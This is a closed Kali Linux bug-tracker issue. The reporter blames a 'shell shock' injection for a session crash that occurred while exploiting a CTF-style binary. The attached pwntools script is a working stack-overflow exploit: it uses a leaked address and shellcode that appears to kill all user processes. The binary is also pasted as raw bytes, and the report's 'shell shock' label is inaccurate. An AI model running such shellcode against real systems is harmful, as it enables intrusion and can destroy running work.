View Issue Details

Jump to NotesJump to History
IDProjectCategoryView StatusDate SubmittedLast Update
0006310Kali LinuxGeneral Bugpublic2020-04-20 13:412021-09-14 20:15
ReporterOverRide0x Assigned To 
PrioritynormalSeverityminorReproducibilityalways
Status closedResolutionsuspended 
Product Version2020.1 
Summary0006310: can inject shell shock throw vulnerable app to close the session and login again
Description

while working on vulnerable challenge , and by accident make my kali crash and the exit session and login again

Steps To Reproduce

you will only need to start the fuzzer.py script with python

look into the source and change the app dir for the vuln app called leak

after run it my kali output file called core you will see it also in the uploaded files

Attached Files
core (1,830,912 bytes)
fuzz.py (509 bytes)    
from pwn import *
import time

sh = process('/home/abdallah/Desktop/htb/JET/leak')
print(sh.recvuntil(b"Oops, I'm leaking! "))
base = sh.recvuntil(b"\n")
print(base[:-1])
rip = int(base[:-1],16)

payload_len = 72

buf = b"\xb0\xaa\x49\xb8\x52\x6f\x6f\x74\x65\x64\x20\x21\x41\x50\x48\x89\xe7\x40\xb6\x08\x0f\x05\x6a\x3e\x58\x6a\xff\x5f\x6a\x09\x5e\x0f\x05"

buf_len = len(buf)
padding = b"A"*(payload_len-buf_len)

payload = buf + padding + p64(rip)

time.sleep(1)
sh.send(payload)
sh.interactive()
sh.close()
fuzz.py (509 bytes)   
leak (9,112 bytes)    
ELF>�@@�@8	@@@@@@��88@8@@@�
�
 ``X� ((`(`��TT@T@DDP�tdL	L	@L	@DDQ�tdR�td``��/lib64/ld-linux-x86-64.so.2GNU GNU�#�_A���p/����rs%j
 �
)�fUa9�"=K)] C/�`�`6�`libc.so.6exitsignalputsstdinprintffgetsstdoutstderralarmsetvbuf__libc_start_main__gmon_start__GLIBC_2.2.5ui	l�`�`
�`�`` `(`0`8`@`H`P`	H��H�
 H��t�H����5
 �%
 @�%
 h����%�	 h�����%�	 h����%�	 h����%�	 h����%�	 h����%�	 h����%�	 h�p����%b	 f�1�I��^H��H���PTI�	@H��@H��/@�w����fD�o`UH-h`H��H��v�H��t]�h`��f�]�@f.��h`UH��h`H��H��H��H��?H�H�t�H��t]�h`��]�fD�=Q	 uUH���n���]�>	 ��@� `H�?u��H��t�UH���]�z���UH��H���}��	@�e��������UH�徖@�����@�^���H�� ���H�����H�� ���H���b���H�� ���H���D����]�UH��H��@��t���H�E�H�ƿ	@������0	@����F	@����H� H�E��H��������ÐAWAVA��AUATL�%n UH�-n SI��I��L)�H��H������H��t 1��L��L��D��A��H��H9�u�H��[]A\A]A^A_Ðf.���H��H���Bye!Oops, I'm leaking! %p
Pwn me ¯\_(ツ)_/¯ > ;@�����T���\J����i�������D�������\zRx��*zRx�$ ����FJw�?;*3$"D����A�C
d����zA�C
u���`A�C
[D�(���eB�B�E �B(�H0�H8�M@r8A0A(B BBB�P���p@P@�@
	@``���o�@@�@
x`�@�@`	���o�@���o�ox@(`@&@6@F@V@f@v@�@GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 201606098@T@t@�@�@@x@�@	�@
@�@@
�@�@	@	@L	@�	@`` `(`�``X`�`� `�@@.P@D�`S`zp@�`�����
@� `��`�(`�`�L	@	`	@/ K�`� X`_q�`�h`)	@���@z����X`� ``(	@7�@e��`��@*G�@Oh`[/@``u ��h`� ��@��`crtstuff.c__JCR_LIST__deregister_tm_clones__do_global_dtors_auxcompleted.7585__do_global_dtors_aux_fini_array_entryframe_dummy__frame_dummy_init_array_entrybabyrop.c__FRAME_END____JCR_END____init_array_end_DYNAMIC__init_array_start__GNU_EH_FRAME_HDR_GLOBAL_OFFSET_TABLE___libc_csu_fini_ITM_deregisterTMCloneTablestdout@@GLIBC_2.2.5puts@@GLIBC_2.2.5stdin@@GLIBC_2.2.5_edataprintf@@GLIBC_2.2.5__initalarm@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5fgets@@GLIBC_2.2.5__data_startsignal@@GLIBC_2.2.5__gmon_start____dso_handle_IO_stdin_used__libc_csu_inithandler__bss_startmainsetvbuf@@GLIBC_2.2.5_Jv_RegisterClassesexit@@GLIBC_2.2.5__TMC_END___ITM_registerTMCloneTablestderr@@GLIBC_2.2.5.symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.plt.got.text.fini.rodata.eh_frame_hdr.eh_frame.init_array.fini_array.jcr.dynamic.got.plt.data.bss.comment8@8#T@T 1t@t$D���o�@�0N�@�8V@x^���ox@xk���o�@� z�@�`�B@���@��@���@���@�b�	@		�	@	9�L	@L	D��	@�	4�`�`� ` �(`(���`��`X�X`X��`h0 0h4��P/	��
leak (9,112 bytes)   

Activities

g0tmi1k

g0tmi1k

2021-09-14 20:15

administrator   ~0015166

This report has been filed against an old version of Kali. We will be closing this ticket due to inactivity.
Please could you see if you are able to replicate this issue with the latest version of Kali Linux (https://www.kali.org/get-kali/)?
If you are still facing the same problem, feel free to re-open the ticket. If you choose to do this, could you provide more information to the issue you are facing, and also give information about your setup?
For more information, please read: https://kali.training/topic/filing-a-good-bug-report/

Issue History

Date Modified Username Field Change
2020-04-20 13:41 OverRide0x New Issue
2020-04-20 13:41 OverRide0x Issue generated from: 0006262
2020-12-01 10:48 g0tmi1k Priority urgent => normal
2020-12-01 10:50 g0tmi1k Severity crash => minor
2021-09-14 20:15 g0tmi1k Status new => closed
2021-09-14 20:15 g0tmi1k Resolution open => suspended
2021-09-14 20:15 g0tmi1k Note Added: 0015166